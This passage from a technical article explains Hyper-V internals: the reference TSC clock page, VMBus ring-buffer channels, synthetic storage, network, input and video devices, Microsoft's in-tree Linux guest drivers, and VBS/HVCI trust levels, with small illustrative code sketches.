The clock side is even more interesting. The Linux kernel Hyper-V clocks documentation [@kernel-clocks] describes a reference TSC page that the hypervisor maintains in shared memory: it contains a scale factor and an offset such that

$$ \text{guest\_time} = \big( (\text{TSC} \times \text{scale}) \gg 64 \big) + \text{offset} $$

ticks at a constant 10 MHz frequency regardless of the underlying TSC. The guest's clock_gettime and gettimeofday can read TSC, multiply, shift, add, and return, all in user space via vDSO, with no kernel transition and no hypercall.
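
The arithmetic is small enough to check by hand. The sketch below uses Python's arbitrary-precision integers to stand in for the 128-bit multiply; `scale_for` is an assumption about how a scale could be derived for a given TSC frequency, not a statement of what the hypervisor actually computes.

```python
REFERENCE_HZ = 10_000_000  # the reference counter ticks at 10 MHz

def scale_for(tsc_hz: int) -> int:
    """Assumed derivation: a 64.64 fixed-point ratio of 10 MHz to the TSC rate."""
    return (REFERENCE_HZ << 64) // tsc_hz

def reference_time(tsc: int, scale: int, offset: int) -> int:
    """Multiply, shift, add: the read path described in the text."""
    return ((tsc * scale) >> 64) + offset
```

With a 3 GHz TSC, one second of TSC ticks converts to within one tick of 10,000,000 reference ticks; the truncating division in the scale accounts for the possible off-by-one.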

A web server that calls `clock_gettime` once per request, on a million-requests-per-second box, is a ridiculous workload that real systems run constantly. Without enlightenments, every call would be a `rdmsr` on a virtualised TSC or a trap into the hypervisor. With the reference TSC page, the same call is four arithmetic ops and a memory load. The kernel doc explains that this scale and offset survive live migration: "in the case of a live migration to a host with a different TSC frequency, Hyper-V adjusts the scale and offset values in the shared page so that the 10 MHz frequency is maintained" (Linux kernel: Hyper-V clocks [@kernel-clocks]).

Synthetic timers complete the picture. Each virtual CPU has four synthetic timers programmable via MSRs; they fire SINTs into the SynIC. The guest does not need to touch an emulated PIT or HPET. Combined, SynIC + synthetic timers + the reference TSC page mean that an enlightened guest can do most of its time-keeping and inter-partition signalling without ever touching the legacy interrupt/timer chip surface.

The TLFS as a contract

All of this is published. The Top-Level Functional Specification [@ms-tlfs] is the document a guest author reads to know which MSRs to write, which cpuid leaves to query, which hypercalls exist, and which features the hypervisor signals via feature flags. Microsoft maintains it under the Open Specification Promise. That promise is a deliberate contractual choice. Without it, Linux could not ship drivers/hv/ in-tree and Microsoft could not credibly claim that Linux is a first-class Hyper-V guest. The TLFS is the artefact that makes the rest of the architecture cooperative rather than reverse-engineered.

The next layer up uses these primitives to build something more ambitious: a general-purpose inter-partition transport.

3. VMBus: the inter-partition transport

If enlightenments are the alphabet, VMBus is the language that synthetic devices speak. The Linux kernel VMBus document [@kernel-vmbus] puts the definition tersely: "VMBus is a software construct provided by Hyper-V to guest VMs. It consists of a control path and common facilities used by synthetic devices that Hyper-V presents to guest VMs. The common facilities include software channels for communicating between the device driver in the guest VM and the synthetic device implementation that is part of Hyper-V, and signaling primitives to allow Hyper-V and the guest to interrupt each other."

There is a lot in that paragraph. Let me unpack it, because this is the architectural core.

**VMBus**: a software-only inter-partition communication bus provided by Hyper-V. It has a control path (channel offer, open, close, rescind), and per-device data channels built on shared memory ring buffers. VMBus is not a real bus in any hardware sense; nothing on the PCIe topology is named VMBus. It is a contract between guest drivers and the hypervisor.

Channels and the offer protocol

Every synthetic device a guest sees corresponds to a VMBus channel. The root partition advertises (OfferChannel) the list of devices a guest is permitted to use. The guest's VMBus driver iterates the offers, matches each to a class GUID (synthetic SCSI is one GUID, synthetic NIC is another, the input-style vmbusrhid device is a third), and binds an in-kernel device driver to each one. The reverse operation, RescindChannel, lets the host revoke a device cleanly, which is what happens during live migration when an SR-IOV virtual function gets pulled out from under a running VM.

sequenceDiagram
    participant Root as Root partition (VSP)
    participant HV as Hyper-V hypervisor
    participant Guest as Guest VM (VSC)
    Root->>HV: OfferChannel(class_guid, instance_guid)
    HV->>Guest: ChannelOffer message via SynIC
    Guest->>HV: OpenChannel(ringbuf_gpa, signal_event)
    HV->>Root: Channel opened
    loop steady-state I/O
        Guest->>Root: write descriptor + payload to ring, signal SINT
        Root->>Guest: write response to ring, signal SINT
    end
    Root->>HV: RescindChannel(instance_guid)
    HV->>Guest: ChannelRescind via SynIC
    Guest->>Root: CloseChannel
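
The guest-side matching step amounts to a table lookup keyed by class GUID. A minimal sketch follows; the GUIDs are deliberately fake placeholders rather than the real device-class GUIDs, and `bind_offers` and `rescind` are illustrative names, not functions from any VMBus driver.

```python
# Placeholder class GUIDs (NOT the real Hyper-V values) mapped to driver names.
DRIVERS = {
    "00000000-0000-0000-0000-00000000000a": "synthetic SCSI driver",
    "00000000-0000-0000-0000-00000000000b": "synthetic NIC driver",
}

def bind_offers(offers):
    """Bind a driver to each offered (class_guid, instance_guid) pair we recognise."""
    bound = {}
    for class_guid, instance_guid in offers:
        driver = DRIVERS.get(class_guid.lower())
        if driver is not None:
            bound[instance_guid] = driver
    return bound

def rescind(bound, instance_guid):
    """Host revoked the device: drop the binding if it exists."""
    bound.pop(instance_guid, None)
```

Offers with an unknown class GUID are simply ignored, which is how a guest without a particular driver still boots with the devices it does understand.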

Two ring buffers, one channel

Each open channel is two unidirectional ring buffers in shared memory: one for guest-to-host messages, one for host-to-guest. Each ring has a 4 KiB header page that holds the read index, the write index, and control flags, plus a power-of-two payload region. The guest tells the hypervisor which guest-physical pages back the ring through an object called a GPA Descriptor List (GPADL), built up via the vmbus_establish_gpadl API.

The kernel doc reveals a small but durable engineering detail. It maps the ring buffer twice in the guest's kernel virtual address space: header page first, ring contents next, and then the ring contents again, contiguously. Why? Because that lets a copy loop walk past the end of the ring without writing wrap-around code; the next byte after the ring's last byte is the ring's first byte, by virtual-memory arrangement. It is the same trick used inside the Linux page cache for fbdev and inside DPDK's mempool. It costs a little address space; it saves a branch on every payload byte.

The Linux kernel doc is explicit that this double-mapping convenience exists in the guest only. If you are writing a userspace tool that ingests a captured VMBus ring (for forensics or debugging) you must implement wrap-around manually. This is exactly the kind of detail that source code documentation captures and prose articles forget.
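
For a userspace tool without the double mapping, the manual wrap-around is a two-slice copy. This sketch assumes the ring payload region has already been extracted as a flat `bytes` object and that the read index and length are known; `ring_read` is a hypothetical helper, and real VMBus packets carry their own descriptors that this ignores.

```python
def ring_read(ring: bytes, read_index: int, length: int) -> bytes:
    """Copy `length` bytes starting at `read_index`, wrapping at the ring's end."""
    size = len(ring)
    if not 0 <= read_index < size or not 0 <= length <= size:
        raise ValueError("index or length outside the ring")
    first = min(length, size - read_index)  # bytes available before the end
    return ring[read_index:read_index + first] + ring[:length - first]
```

With the double mapping in place, the second slice disappears: the guest kernel reads `length` contiguous bytes from `read_index` and the page tables do the wrapping.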

The total amount of GPADL-shared memory a single guest can hold is capped per Windows version. The kernel doc records the numbers: roughly 1280 MiB on Windows Server 2019 and later, roughly 384 MiB on earlier hosts (Linux kernel: VMBus [@kernel-vmbus]). For a guest with 30+ channels (multiple netvsc subchannels, multiple storvsc subchannels, vPCI, KVP, time sync, VSS, balloon, framebuffer), that ceiling is real but not yet limiting at typical ring sizes of 1 to 16 MiB per direction.
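
A quick budget check makes the ceiling tangible. The sketch counts ring payload only (two rings per channel) and ignores header pages and any other GPADL-backed buffers a driver may allocate, so treat it as a lower bound; `gpadl_ring_bytes` is an illustrative helper.

```python
MIB = 1024 * 1024

def gpadl_ring_bytes(channels: int, ring_mib_per_direction: int) -> int:
    """Ring memory for `channels` channels, each with one ring per direction."""
    return channels * 2 * ring_mib_per_direction * MIB

# 30 channels at the top of the 1 to 16 MiB range quoted above.
usage = gpadl_ring_bytes(30, 16)
```

Thirty channels at 16 MiB per direction come to 960 MiB, which fits under the roughly 1280 MiB ceiling but would not fit under the roughly 384 MiB one; at 1 MiB per direction the same guest needs only 60 MiB.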

The doorbell

Shared memory alone is not enough. The guest can write into the ring all it wants; the host will not look until it is told to. Conversely, the host can write into the ring; the guest will not check until something signals it. That signal is the doorbell, and it is implemented via the Synthetic Interrupt Controller SINTs introduced in the previous section.

When the guest enqueues a request and the host's read pointer is already chasing it (i.e., the host is still processing the last batch), the guest can suppress the doorbell entirely. Only the first request after the host has caught up triggers a hypercall. This is interrupt coalescing in software, and it is the single most important performance lever on a software data plane: the round-trip cost of a VMEXIT is amortised across many packets.
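
The suppression rule can be modelled with two counters. This is a simplified sketch, not the VMBus algorithm itself: indices grow without wrapping, the `Ring` class is hypothetical, and the only rule modelled is "signal when the consumer had already caught up".

```python
class Ring:
    """Toy producer/consumer ring that counts doorbells instead of sending them."""

    def __init__(self):
        self.read_index = 0
        self.write_index = 0
        self.doorbells = 0

    def enqueue(self, n=1):
        # The consumer is idle only if it had drained everything written so far.
        consumer_caught_up = self.write_index == self.read_index
        self.write_index += n
        if consumer_caught_up:
            self.doorbells += 1  # stands in for the signalling hypercall

    def consume_all(self):
        self.read_index = self.write_index
```

Five back-to-back enqueues against a busy consumer cost one doorbell, not five; the next doorbell is only paid after the consumer drains the ring.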

Note: This same shape, shared memory rings plus an event-channel doorbell, was the central insight of Xen's split-driver paravirtualization model in 2003 [@xen-pv-wiki]. Hyper-V's contribution was not the shape; it was packaging the shape so unmodified Windows guests could use it via in-box drivers, and publishing the protocol so unmodified Linux could too.

VSPs and VSCs

The two endpoints of a channel have specific names. The Virtualization Service Provider (VSP) is the kernel module in the root partition that owns the device backend. The Virtualization Service Client (VSC) is the guest-side driver that talks to the VSP through the channel. Microsoft's own architecture page is precise: "the Hyper-V-specific I/O architecture consists of virtualization service providers (VSPs) in the root partition and virtualization service clients (VSCs) in the child partition. Each service is exposed as a device over VM Bus, which acts as an I/O bus and enables high-performance communication between VMs that use mechanisms such as shared memory" (Microsoft Learn: Hyper-V architecture [@ms-hyperv-architecture-perf]).

**VSP** (Virtualization Service Provider): a kernel module in the root partition that exposes a synthetic device backend to guests over a VMBus channel. Examples: `vmswitch.sys` (synthetic NIC), `storvsp.sys` (synthetic SCSI), the `vmbusrhid` server (synthetic input). **VSC** (Virtualization Service Client): the matching driver in the guest that consumes the channel and presents an OS-native device interface (a NIC, a SCSI controller, a keyboard) to the rest of the kernel.

The split is symmetric in transport (both sides use the same ring) but asymmetric in trust. The VSP runs in the most privileged context on the box, the root partition's kernel. The VSC runs in a normal guest kernel. Every byte that flows from guest to host crosses a trust boundary and gets parsed by code with full system privilege. The next two sections will return to this fact at length, because it is where the security story lives.

Why this works for closed-source guests

The Xen project tried something similar in 2003 with netfront/blkfront rings and event channels, but Xen PV required a paravirtualised guest kernel: the guest had to know it was running on Xen at compile time. Closed-source guests like Windows could not be modified, so Xen's wiki [@xen-pv-wiki] documents PV-on-HVM as the eventual workaround.

Hyper-V finessed this with hardware virtualization. The guest kernel runs unmodified inside VT-x or AMD-V; CPU-level privilege separation handles the privileged instructions. The only thing the guest needs to do to opt into VMBus is load a driver. Every supported Windows version since Windows 7 / Server 2008 R2 ships those drivers in-box. Linux ships them in-tree from kernel 2.6.32 onward. There is no separate "install paravirt drivers" step, which is why Hyper-V "just works" for almost any guest you point at it.

The transport is settled. What rides on it is a catalogue.

4. Synthetic device classes: storage, network, input, video, vPCI

A modern Hyper-V guest, on first boot, sees a small zoo of devices that have nothing to do with PC hardware. There is no IDE controller, no PS/2 keyboard, no Cirrus VGA. There is a synthetic SCSI controller, a synthetic NIC, a synthetic keyboard and mouse, a synthetic framebuffer, and (often) a synthetic PCI passthrough channel. Each is a VSP/VSC pair on top of VMBus.

The Linux kernel VMBus document [@kernel-vmbus] enumerates the catalogue: synthetic SCSI controller (storvsc), synthetic NIC (netvsc), synthetic framebuffer (synthvid), synthetic keyboard, synthetic mouse, PCI passthrough, plus the non-device services: heartbeat, time sync, shutdown, memory balloon, KVP exchange, and online backup (VSS).

```mermaid
flowchart LR
    subgraph Guest
        nv["netvsc (NIC)"]
        st["storvsc (SCSI)"]
        sv["synthvid (framebuffer)"]
        kb["hyperv-keyboard"]
        ms["hyperv-mouse"]
        pc["pci-hyperv (vPCI)"]
        kvp["hv_kvp (KVP)"]
        ts["hv_utils (timesync, shutdown, heartbeat)"]
    end
    subgraph Root
        vsw["vmswitch.sys"]
        sto["storvsp.sys"]
        sfb["synthvid VSP"]
        rhid["vmbusrhid VSP"]
        vpci["vPCI VSP"]
        kvpd["KVP daemon"]
        tsd["IS daemons"]
    end
    nv -- "VMBus channel" --- vsw
    st -- "VMBus channel(s)" --- sto
    sv -- "VMBus channel" --- sfb
    kb -- "VMBus channel" --- rhid
    ms -- "VMBus channel" --- rhid
    pc -- "VMBus channel" --- vpci
    kvp -- "VMBus channel" --- kvpd
    ts -- "VMBus channel" --- tsd
```

Synthetic SCSI: storvsc

The storvsc VSC presents itself to the guest as a SCSI host bus adapter. Disks attached to the VM appear as SCSI LUNs hanging off that HBA. The wire protocol uses ring buffers carrying SRB (SCSI Request Block) style commands. To scale, storvsc can open multiple sub-channels, one per host CPU, so that I/O completion interrupts and request submission spread across cores rather than serialising on a single VMBus channel.
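The sub-channel idea can be sketched in a few lines. This is a toy model, not the storvsc driver: the modulo selection policy, the `makeChannelSet` / `pickChannel` / `submit` names, and the channel counts are all assumptions made for illustration.

```javascript
// Hypothetical model: one primary channel plus N sub-channels, each its own ring.
function makeChannelSet(subChannelCount) {
  const channels = [];
  for (let i = 0; i <= subChannelCount; i++) {
    channels.push({ id: i, submitted: 0 });
  }
  return channels;
}

// Assumed policy: pick a channel from the submitting CPU's index so that
// requests from different CPUs land on different rings where possible.
function pickChannel(channels, cpu) {
  return channels[cpu % channels.length];
}

function submit(channels, cpu) {
  const ch = pickChannel(channels, cpu);
  ch.submitted += 1;
  return ch.id;
}

const channels = makeChannelSet(3); // primary + 3 sub-channels = 4 rings
const used = [0, 1, 2, 3, 4, 5, 6, 7].map((cpu) => submit(channels, cpu));
console.log(used); // ring chosen for each of 8 submitting CPUs
```

With four rings and eight submitting CPUs, each ring ends up carrying a quarter of the requests instead of one ring carrying all of them, which is the whole point of the design.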

This is also why Hyper-V's "Generation 2" VMs work. A Generation 2 VM [@ms-gen1-gen2-vms], introduced in Windows Server 2012 R2 in 2013, has no IDE controller in the boot path at all. UEFI loads the OS loader from a synthetic SCSI device, the OS loader hands off to the kernel, and the kernel binds storvsc to the same device. The legacy IDE emulator simply never runs. That removes a lot of attack surface and lets boot volumes grow up to 64 TB on VHDX.

Synthetic NIC: netvsc

netvsc is the synthetic NIC. The wire protocol historically wrapped Microsoft's NDIS-style RNDIS frames around payloads sent through the channel ring, which is why some Linux discussions mention "RNDIS frames over VMBus." The Linux driver lives in drivers/net/hyperv/ and the kernel netvsc documentation [@kernel-netvsc] describes how it can spread receive-side traffic across multiple VMBus subchannels via Receive Side Scaling.

netvsc is also the one device class where Hyper-V composes with hardware passthrough. Section 8 will take this apart in detail; for now, note that the same netvsc VSC can run alongside an SR-IOV virtual function in the guest, with netvsc acting as the slow-path failover and the VF carrying the steady-state traffic.

Synthetic input: vmbusrhid

The synthetic keyboard, the synthetic mouse, and a few related input streams ride on a server in the root partition called vmbusrhid (the name is shorthand for "VMBus relay HID"). It is a small surface in bytes, but architecturally it has the same shape as netvsc: guest-controllable messages parsed in kernel mode in the root partition. Anyone evaluating the trust boundary should treat it the same way as netvsc, even though the data rate is several orders of magnitude lower.

Note: A path that carries 100 keystrokes per second is, on the wire, almost free. As an attack surface, it is identical to a path that carries a million packets per second: both are guest-controlled bytes parsed by privileged code. Section 7 walks through why the security community treats vmbusrhid the way it treats vmswitch.sys.

Synthetic video: synthvid

synthvid is a synthetic framebuffer. It is what lets you connect to a Hyper-V VM through the Virtual Machine Connection client without dragging in an emulated VGA. It is intentionally simple: there is no 3D acceleration in the synthetic path. Workloads that need GPU acceleration use a different mechanism, vPCI / DDA, to assign a real GPU to the VM.

vPCI: synthetic PCI passthrough

The most subtle device class is pci-hyperv, which exposes a virtual PCIe topology to the guest. The Linux kernel vPCI document [@kernel-vpci] describes the trick: a passthrough device is offered to the guest initially over VMBus (the channel carries the device's PCI configuration space and BARs), and once the guest's vPCI driver has constructed a real PCI device object for it, the device dual-identifies as a normal PCIe device. The vendor driver can then load against it.

This is the mechanism behind both Hyper-V's Discrete Device Assignment (DDA) [@ms-dda] and Azure's Accelerated Networking, which we will return to in Section 8. The DDA planning document is explicit that Microsoft formally supports DDA for GPUs and NVMe storage as device classes; other PCIe devices are "likely to work" but require vendor support.

Generation-1 vs Generation-2: a quick decoder

Putting the device classes side by side clarifies why the move from Generation-1 to Generation-2 VMs simplified so much:

| Element | Generation-1 VM (legacy) | Generation-2 VM (since 2013) |
|---|---|---|
| Firmware | BIOS | UEFI with Secure Boot |
| Boot disk | Emulated IDE | Synthetic SCSI (`storvsc`) |
| Network on boot | Emulated DEC 21140 fallback | Synthetic NIC (`netvsc`) |
| Input | Emulated PS/2 + `vmbusrhid` | `vmbusrhid` only |
| Display | Emulated VGA + `synthvid` | `synthvid` only |
| Max boot VHDX | 2 TB | 64 TB |
| Source | Microsoft Learn: Gen 1 vs Gen 2 [@ms-gen1-gen2-vms] | Same |

Generation-2 is what the Hyper-V architecture wanted to be from the beginning: an all-synthetic stack with no fallback to imaginary 1990s chipsets. The two-generation existence was not a design preference; it was the cost of supporting older operating systems whose boot loaders only knew about BIOS and IDE. Today, every modern Windows and modern Linux supports Generation-2; Generation-1 remains for legacy guests.

Counting boundary crossings

The shape of the hot path is now visible. To send one network packet from a guest:

The guest writes one descriptor and one payload copy into the netvsc TX ring (one memory copy).
The guest possibly fires a doorbell (one hypercall, often suppressed if the host has not caught up).
The host's vmswitch.sys reaps the descriptor, parses it, and forwards it through the virtual switch to a real NIC.

A single packet's hot path is at most one hypercall and one memory copy in the guest, plus host-side ring traversal. Section 8's comparison table will quantify how this stacks up against virtio and SR-IOV, but the scale is clear: paravirt I/O on Hyper-V is orders of magnitude cheaper per packet than full PC emulation, and the gap closes only when you go all the way to hardware passthrough.
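A minimal sketch of that accounting, under a simplifying assumption: the guest fires the doorbell only when the ring was empty before the write, on the theory that a non-empty ring means the host is already due to process it. The `TxRing` class and its counters are illustrative names, not driver symbols.

```javascript
// Simplified model of a guest-to-host TX ring with doorbell suppression.
class TxRing {
  constructor() {
    this.pending = [];   // descriptors written but not yet reaped by the host
    this.copies = 0;     // payload copies into the ring
    this.hypercalls = 0; // doorbells actually fired
  }

  // Guest side: copy the payload in, then signal only on the
  // empty -> non-empty transition.
  send(packet) {
    const wasEmpty = this.pending.length === 0;
    this.pending.push(packet);
    this.copies += 1;
    if (wasEmpty) this.hypercalls += 1;
  }

  // Host side: reap everything currently in the ring in one pass.
  hostDrain() {
    const reaped = this.pending.length;
    this.pending = [];
    return reaped;
  }
}

const ring = new TxRing();
// A burst of 8 packets lands before the host runs, then 1 more afterwards.
for (let i = 0; i < 8; i++) ring.send({ seq: i });
const firstBatch = ring.hostDrain();
ring.send({ seq: 8 });
const secondBatch = ring.hostDrain();

console.log({ copies: ring.copies, hypercalls: ring.hypercalls, firstBatch, secondBatch });
```

In this run nine packets cost nine copies but only two doorbells, which is why "at most one hypercall per packet" is an upper bound rather than the typical case under load.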

The catalogue is set. Now, who actually wrote the Linux side of all this?

5. Linux Integration Services: Microsoft writes Linux drivers

In December 2009, Microsoft did something quietly historic. Linux kernel 2.6.32 merged a set of drivers under drivers/staging/hv/, contributed by Microsoft itself, that taught the Linux kernel to be an enlightened Hyper-V guest. The kernel.org Hyper-V index page [@kernel-hyperv-index] is the maintained landing page for that work. Over the next several releases the drivers moved out of staging/, settled at drivers/hv/, drivers/net/hyperv/, drivers/scsi/storvsc_drv.c, and drivers/pci/controller/pci-hyperv.c, and became the default in every mainstream distribution.

That set of drivers is collectively called Linux Integration Services (LIS).

**Linux Integration Services (LIS)**: the set of in-kernel Hyper-V guest drivers that Microsoft contributes to upstream Linux. Includes `hv_vmbus` (the VMBus core), `hv_netvsc` (synthetic NIC), `hv_storvsc` (synthetic SCSI), `hv_utils` (KVP, time sync, shutdown, heartbeat, VSS), `pci-hyperv` (vPCI), and `hv_balloon` (memory ballooning). The same code that Microsoft maintains in the Linux tree powers Linux guests on Hyper-V on Windows Server, on Azure, and on developer Hyper-V on Windows 11.

The reason this matters is bigger than convenience. In 2009, Linux had a long, painful history with Hyper-V's competitors. VMware shipped open-vm-tools but the deepest paravirt drivers (VMXNET3, PVSCSI) lived in vendor packages. Xen's PV drivers existed in-tree but their evolution depended on Citrix and the Xen project. By contributing the full driver stack upstream and committing to keep it there, Microsoft chose a different route: they put the spec (the TLFS) and the implementation (LIS) in the open at the same time.

Microsoft did not just publish a hypervisor specification and hope Linux would adopt it. They wrote the Linux drivers themselves and upstreamed them, and then they kept doing it for fifteen years.

You can see the maintenance pattern in any current kernel. The drivers/hv/ directory has continuous commit activity from Microsoft engineers. Kernel-doc files like the VMBus [@kernel-vmbus], clocks [@kernel-clocks], vPCI [@kernel-vpci], overview [@kernel-hyperv-overview], and CoCo VM [@kernel-coco] pages are written by the same engineers who write the drivers. Several of those documents are the most lucid descriptions of the architecture that exist anywhere in public.

One unexpected consequence: the Linux kernel docs are often easier to read for the architecture than Microsoft's own customer-facing docs. The customer docs answer "how do I configure this?"; the kernel docs answer "what is actually happening?" When researching this article, I found that the cleanest single description of VMBus channel lifecycle is the Linux kernel doc, not the TLFS.

What "in-box" really means

Both major guests now ship VMBus support without any post-install step:

On Windows, the VMBus client stack is built into every supported Windows version since Windows 7 / Windows Server 2008 R2. The legacy Integration Services package, which once shipped as an ISO you mounted into the VM, is no longer needed on supported Windows.
On Linux, the drivers are in-tree from kernel 2.6.32 (December 2009) onward and ship in every mainstream distro.

The kernel.org Hyper-V overview document [@kernel-hyperv-overview] explicitly warns against installing legacy LIS packages on top of a kernel that already has the in-tree drivers: it can break MSI-X handling and PCI passthrough. This is the kind of operational footgun that survives precisely because the in-box answer is correct and the LIS package is a holdover from earlier kernels.

A practical smoke test

You can confirm a Linux guest is using its enlightenments without any vendor tooling. The kernel logs Hyper-V detection in dmesg and exposes the VMBus devices and their bound drivers under /sys. A small script models the check:

```javascript
// This logic mirrors what `dmesg | grep -i hyperv` and a peek into
// /sys/bus/vmbus/devices would tell you on a real Linux Hyper-V guest.
// The observations are hard-coded here; nothing is read from the system.

const guestObservations = {
  cpuidSig: '0x40000000',   // CPUID leaf that returns the "Microsoft Hv" vendor signature
  guestOsIdMsr: 0x40000000, // HV_X64_MSR_GUEST_OS_ID, written by the guest
  hypercallMsr: 0x40000001, // HV_X64_MSR_HYPERCALL, used to set up the hypercall page
  vmbusModuleLoaded: true,
  netvscDevice: '/sys/class/net/eth0/device/driver',
  netvscDriverName: 'hv_netvsc',
  storvscModuleLoaded: true,
};

function isEnlightenedHyperVGuest(o) {
  if (o.cpuidSig !== '0x40000000') return false;
  if (!o.vmbusModuleLoaded) return false;
  if (o.netvscDriverName !== 'hv_netvsc') return false;
  // The success message claims storvsc too, so check it as well.
  if (!o.storvscModuleLoaded) return false;
  return true;
}

console.log(
  isEnlightenedHyperVGuest(guestObservations)
    ? 'Yes: Hyper-V enlightened, using netvsc + storvsc'
    : 'No: running on emulated PC hardware or non-Hyper-V hypervisor'
);
```

The point is not the script itself (anyone can write a few lines of awk against dmesg); it is that the verification surface is public. The CPU vendor signature, the MSRs, the kernel module names, the /sys paths are all documented. There is nothing to reverse-engineer.
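As one concrete instance of that public surface, here is a hedged sketch of decoding the hypervisor vendor ID. CPUID leaf 0x40000000 returns twelve ASCII bytes in EBX, ECX, and EDX, and the TLFS documents the Hyper-V value as "Microsoft Hv". The register constants below are those published values; on a real guest they would come from a cpuid tool, and the `decodeVendorId` helper is a name invented for this example.

```javascript
// Decode the 12-byte vendor ID from three 32-bit registers.
// Each register holds four ASCII bytes, least significant byte first.
function decodeVendorId(ebx, ecx, edx) {
  const bytes = [];
  for (const reg of [ebx, ecx, edx]) {
    for (let shift = 0; shift < 32; shift += 8) {
      bytes.push((reg >>> shift) & 0xff);
    }
  }
  return String.fromCharCode(...bytes);
}

// Published Hyper-V register values for leaf 0x40000000 (hard-coded here).
const vendor = decodeVendorId(0x7263694d, 0x666f736f, 0x76482074);
const isHyperV = vendor === 'Microsoft Hv';

console.log(JSON.stringify(vendor), isHyperV);
```

A different hypervisor returns a different twelve bytes from the same leaf, so the same decoder also works as a "which hypervisor am I on?" probe.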

Why this earned trust

Two pieces of practical evidence persuaded the Linux community that LIS was not a strategic trap:

The drivers stayed upstream. From 2009 to the present, Microsoft has maintained the drivers/hv/ tree, responded to maintainer feedback, and shipped patches through the normal kernel process.
The TLFS stayed accurate. Successive Hyper-V releases either matched what the TLFS said or updated the TLFS. There was no second, secret protocol.

The combination put Microsoft in the unusual position of being the most open hypervisor vendor for Linux guest support. (VirtIO on KVM has a richer cross-vendor story; that comparison is Section 8.) This open posture is also what set up the 2024 OpenVMM open-sourcing as a credible move rather than a stunt.

But before we get to OpenVMM, we need to look at a different way Hyper-V matters: not just as a substrate for VMs, but as a substrate for in-VM security boundaries inside Windows itself.

6. VBS and HVCI: Hyper-V as the trust anchor inside Windows

Up to this point the article has treated Hyper-V as a virtualization product: a thing that hosts VMs. Starting in Windows 10 and Windows Server 2016 [@ms-server-2016], Microsoft began using the same hypervisor for a different job: enforcing security boundaries inside a single OS install. The umbrella name is Virtualization-Based Security (VBS).

The mechanism is simple in description and subtle in consequences. The hypervisor splits a single guest's address space into two Virtual Trust Levels (VTLs). The lower one, VTL0, runs the normal Windows kernel and user mode (this is where explorer.exe and your browser live). The higher one, VTL1, runs a much smaller stack called the Secure Kernel plus a set of isolated user-mode services called trustlets. A compromise of VTL0, even of ntoskrnl.exe, cannot read or write VTL1 memory because the hypervisor enforces that boundary using the same hardware machinery (Intel EPT / AMD NPT, plus Intel VT-d / AMD-Vi for DMA) that it uses to isolate one VM from another.

**Virtual Trust Level (VTL)**: a Hyper-V construct that partitions a single guest's address space into multiple privilege tiers enforced by the hypervisor. VTL0 hosts the normal kernel and user mode; VTL1 hosts the Secure Kernel and trustlets. The hypervisor presents each VTL with its own separate set of memory mappings, system registers, and interrupt state, so code running at VTL0 cannot read VTL1's memory even if it has run-as-NT-AUTHORITY-SYSTEM privilege.

```mermaid
flowchart TD
    HV["Hyper-V hypervisor"]
    subgraph Guest["A single Windows guest"]
        subgraph VTL0["VTL0 (normal world)"]
            User0["User mode: apps"]
            Kernel0["NT kernel"]
        end
        subgraph VTL1["VTL1 (secure world)"]
            SK["Secure Kernel"]
            Trustlets["Trustlets: LSAIso, BIOiso, ..."]
        end
    end
    HV --> Guest
    HV -. "EPT + IOMMU enforcement" .-> VTL0
    HV -. "EPT + IOMMU enforcement" .-> VTL1
    Kernel0 -. "VTL switch (hypercall)" .-> SK
```

What lives in VTL1

The flagship inhabitant of VTL1 is Hypervisor-protected Code Integrity (HVCI), which moves kernel-mode page-table integrity checking into the Secure Kernel. With HVCI on, no VTL0 driver can mark a kernel page as both writable and executable; the Secure Kernel mediates the page tables and refuses the request. The result is that attackers who already have code execution in the NT kernel cannot trivially load arbitrary unsigned kernel code or build new executable JIT pages on the fly.
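The policy described above can be written down as a toy decision function. This is a sketch of the rule, not of the Secure Kernel: the request shape, the `codeIntegrityVerified` flag, and the `secureKernelAllows` name are all assumptions for illustration.

```javascript
// Toy model of a policy check on VTL0 page-protection requests.
function secureKernelAllows(request) {
  const { writable, executable, codeIntegrityVerified } = request;
  if (writable && executable) return false;               // never writable and executable at once
  if (executable && !codeIntegrityVerified) return false; // executable only for verified code
  return true;
}

const requests = [
  { name: 'driver data page', writable: true, executable: false, codeIntegrityVerified: false },
  { name: 'signed driver code', writable: false, executable: true, codeIntegrityVerified: true },
  { name: 'JIT-style RWX page', writable: true, executable: true, codeIntegrityVerified: false },
  { name: 'unsigned code page', writable: false, executable: true, codeIntegrityVerified: false },
];

const decisions = requests.map((r) => `${r.name}: ${secureKernelAllows(r) ? 'allow' : 'deny'}`);
console.log(decisions.join('\n'));
```

The important design property is where the function runs, not what it checks: the same two-line rule inside the NT kernel could be patched out by an attacker who already controls that kernel, whereas in VTL1 it cannot.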

The other tenants of VTL1 are trustlets. The most familiar is lsaiso.exe (LSA Isolation), which holds the cached domain credentials that historically lived in lsass.exe and were the prime target for tools like Mimikatz. With Credential Guard on, those secrets move to a trustlet whose memory is unreadable from VTL0; even SYSTEM-level malware in the normal world cannot extract them. Other trustlets handle biometric template storage, key isolation for code integrity policy, and similar small, security-sensitive workloads.

Why the hypervisor is the right place for this

Putting these protections inside the hypervisor rather than inside the kernel has a property that no in-kernel mitigation can match: the protected component does not share an address space with the attacker. A defence built inside ntoskrnl.exe (PatchGuard, KASLR, control-flow guard) lives in the same memory the attacker is trying to corrupt. A defence built inside VTL1 lives in memory the attacker cannot touch, because the page tables that map it are themselves invisible from VTL0.

Note: Pre-VBS Windows had decades of memory-safety bugs in the NT kernel. After VBS, exploiting one of those bugs no longer immediately yields the attacker the ability to read LSASS secrets or load arbitrary kernel code. The attacker now needs a second bug, in the much smaller Secure Kernel codebase. The defender's effective budget went up by a large multiplier without rewriting a single line of NT.

How this connects back to VMBus

VBS would not be possible without the work the previous sections described. The Secure Kernel is what runs in VTL1; it needs to communicate with VTL0 for ordinary system services (the lsaiso.exe process must respond to authentication requests from VTL0 callers, the HVCI mediator must answer page-table requests, and so on). The signalling and shared-memory primitives that make those calls cheap are the same SynIC and shared-page primitives that VMBus uses between partitions.

In other words, the architecture Microsoft built in 2008 to give a Windows VM a fast network card became, in 2016, the architecture that gives a single Windows install a security boundary stronger than its own kernel. The same hypervisor, the same trust-mediation primitives, two completely different applications.

Windows Server 2019 [@ms-server-2019] extended this further with Hyper-V isolation for containers, where a container's lightweight VM gets its own kernel inside a tiny VTL0 of its own. The pattern is consistent: every time Windows wanted a stronger isolation primitive, the answer was "use the hypervisor."

